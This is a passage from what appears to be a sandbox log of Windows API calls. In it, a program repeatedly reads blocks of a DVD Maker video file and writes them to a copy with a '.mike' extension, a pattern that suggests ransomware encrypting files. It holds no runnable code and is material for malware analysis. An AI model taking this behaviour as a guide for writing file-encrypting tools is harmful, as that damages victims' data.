[0063.560] GetFileType (hFile=0x288) returned 0x1 [0063.560] GetFileType (hFile=0x288) returned 0x1 [0063.560] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2afa20 [0063.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.561] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.561] GetFileType (hFile=0x288) returned 0x1 [0063.561] GetFileType (hFile=0x288) returned 0x1 [0063.561] SetFilePointer (in: hFile=0x288, lDistanceToMove=2826240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2b2000 [0063.561] ReadFile (in: hFile=0x288, lpBuffer=0x22d8254, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22d8254*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.574] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.574] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.574] GetFileType (hFile=0x288) returned 0x1 [0063.574] GetFileType (hFile=0x288) returned 0x1 [0063.574] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2b2220 [0063.575] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.575] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.575] GetFileType (hFile=0x288) returned 0x1 [0063.575] GetFileType (hFile=0x288) returned 0x1 [0063.575] SetFilePointer (in: hFile=0x288, lDistanceToMove=2836480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2b4800 [0063.575] ReadFile (in: hFile=0x288, lpBuffer=0x22e5284, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22e5284*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.577] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0063.578] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.578] GetFileType (hFile=0x288) returned 0x1 [0063.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0063.578] GetFileType (hFile=0x288) returned 0x1 [0063.578] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2b4a20 [0063.578] WriteFile (in: hFile=0x288, lpBuffer=0x20eedc8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x20eedc8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0063.578] CloseHandle (hObject=0x288) returned 1 [0063.631] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0063.631] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.632] GetFileType (hFile=0x288) returned 0x1 [0063.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0063.632] GetFileType (hFile=0x288) returned 0x1 [0063.632] SetFilePointer (in: hFile=0x288, lDistanceToMove=2846720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2b7000 [0063.632] ReadFile (in: hFile=0x288, lpBuffer=0x20f1890, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x20f1890*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.632] CloseHandle (hObject=0x288) returned 1 [0063.633] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0063.633] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.633] GetFileType (hFile=0x288) returned 0x1 [0063.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0063.633] GetFileType (hFile=0x288) returned 0x1 [0063.633] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2b7220 [0063.634] WriteFile (in: hFile=0x288, lpBuffer=0x20fbdf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x20fbdf8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0063.634] CloseHandle (hObject=0x288) returned 1 [0063.673] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0063.673] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.673] GetFileType (hFile=0x288) returned 0x1 [0063.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0063.673] GetFileType (hFile=0x288) returned 0x1 [0063.673] SetFilePointer (in: hFile=0x288, lDistanceToMove=2856960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2b9800 [0063.673] ReadFile (in: hFile=0x288, lpBuffer=0x20fe8c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x20fe8c0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.674] CloseHandle (hObject=0x288) returned 1 [0063.674] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0063.675] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.675] GetFileType (hFile=0x288) returned 0x1 [0063.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0063.675] GetFileType (hFile=0x288) returned 0x1 [0063.675] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2b9a20 [0063.675] WriteFile (in: hFile=0x288, lpBuffer=0x2108e28*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2108e28*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0063.675] CloseHandle (hObject=0x288) returned 1 [0063.761] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0063.761] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.761] GetFileType (hFile=0x288) returned 0x1 [0063.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0063.761] GetFileType (hFile=0x288) returned 0x1 [0063.761] SetFilePointer (in: hFile=0x288, lDistanceToMove=2867200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2bc000 [0063.761] ReadFile (in: hFile=0x288, lpBuffer=0x210b8f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x210b8f0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.930] CloseHandle (hObject=0x288) returned 1 [0063.930] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0063.930] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.931] GetFileType (hFile=0x288) returned 0x1 [0063.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0063.931] GetFileType (hFile=0x288) returned 0x1 [0063.931] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2bc220 [0063.931] WriteFile (in: hFile=0x288, lpBuffer=0x2115e58*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2115e58*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0063.931] CloseHandle (hObject=0x288) returned 1 [0063.978] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0063.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0063.978] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.978] GetFileType (hFile=0x288) returned 0x1 [0063.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0063.978] GetFileType (hFile=0x288) returned 0x1 [0063.979] SetFilePointer (in: hFile=0x288, lDistanceToMove=2877440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2be800 [0063.979] ReadFile (in: hFile=0x288, lpBuffer=0x2118920, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2118920*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0063.980] CloseHandle (hObject=0x288) returned 1 [0063.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0063.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0063.981] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0063.981] GetFileType (hFile=0x288) returned 0x1 [0063.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0063.981] GetFileType (hFile=0x288) returned 0x1 [0063.981] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2bea20 [0063.982] WriteFile (in: hFile=0x288, lpBuffer=0x2122e88*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2122e88*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0063.983] CloseHandle (hObject=0x288) returned 1 [0064.029] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.029] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.029] GetFileType (hFile=0x288) returned 0x1 [0064.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.029] GetFileType (hFile=0x288) returned 0x1 [0064.030] SetFilePointer (in: hFile=0x288, lDistanceToMove=2887680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2c1000 [0064.030] ReadFile (in: hFile=0x288, lpBuffer=0x2125950, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2125950*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.031] CloseHandle (hObject=0x288) returned 1 [0064.031] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.031] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.032] GetFileType (hFile=0x288) returned 0x1 [0064.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.032] GetFileType (hFile=0x288) returned 0x1 [0064.032] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2c1220 [0064.032] WriteFile (in: hFile=0x288, lpBuffer=0x212feb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x212feb8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.033] CloseHandle (hObject=0x288) returned 1 [0064.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.075] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.075] GetFileType (hFile=0x288) returned 0x1 [0064.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.075] GetFileType (hFile=0x288) returned 0x1 [0064.075] SetFilePointer (in: hFile=0x288, lDistanceToMove=2897920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2c3800 [0064.075] ReadFile (in: hFile=0x288, lpBuffer=0x2132980, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2132980*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.076] CloseHandle (hObject=0x288) returned 1 [0064.077] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.077] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.077] GetFileType (hFile=0x288) returned 0x1 [0064.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.077] GetFileType (hFile=0x288) returned 0x1 [0064.077] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2c3a20 [0064.077] WriteFile (in: hFile=0x288, lpBuffer=0x213cee8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x213cee8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.077] CloseHandle (hObject=0x288) returned 1 [0064.131] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.131] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.131] GetFileType (hFile=0x288) returned 0x1 [0064.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.131] GetFileType (hFile=0x288) returned 0x1 [0064.132] SetFilePointer (in: hFile=0x288, lDistanceToMove=2908160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2c6000 [0064.132] ReadFile (in: hFile=0x288, lpBuffer=0x213f9b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x213f9b0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.133] CloseHandle (hObject=0x288) returned 1 [0064.134] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.134] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.134] GetFileType (hFile=0x288) returned 0x1 [0064.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.134] GetFileType (hFile=0x288) returned 0x1 [0064.134] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2c6220 [0064.134] WriteFile (in: hFile=0x288, lpBuffer=0x2149f18*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, 